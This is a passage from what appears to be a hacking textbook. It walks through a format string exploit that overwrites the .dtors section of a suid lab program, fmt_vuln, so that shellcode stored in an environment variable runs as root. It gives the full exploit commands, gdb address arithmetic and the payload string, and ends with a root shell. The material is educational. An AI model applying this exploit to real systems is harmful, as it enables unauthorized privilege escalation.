Graphics Programs Reference
In-Depth Information
Since the
.dtors
section is writable, if the address after the
0xffffffff
is
overwritten with a memory address, the program's execution flow will be
directed to that address when the program exits. This will be the address of
__DTOR_LIST__
plus four, which is
0x08049694
(which also happens to be the
address of
__DTOR_END__
in this case).
If the program is suid root, and this address can be overwritten, it will be
possible to obtain a root shell.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $
Shellcode can be put into an environment variable, and the address can
be predicted as usual. Since the program name lengths of the helper program
getenvaddr.c and the vulnerable fmt_vuln.c program differ by two bytes, the
shellcode will be located at
0xbffff9ec
when fmt_vuln.c is executed. This
address simply has to be written into the
.dtors
section at
0x08049694
(shown
in bold below) using the format string vulnerability. In the output below the
short write method is used.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694
d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
Even though the
.dtors
section isn't properly terminated with a NULL
address of
0x00000000
, the shellcode address is still considered to be a destructor
function. When the program exits, the shellcode will be called, spawning a
root shell.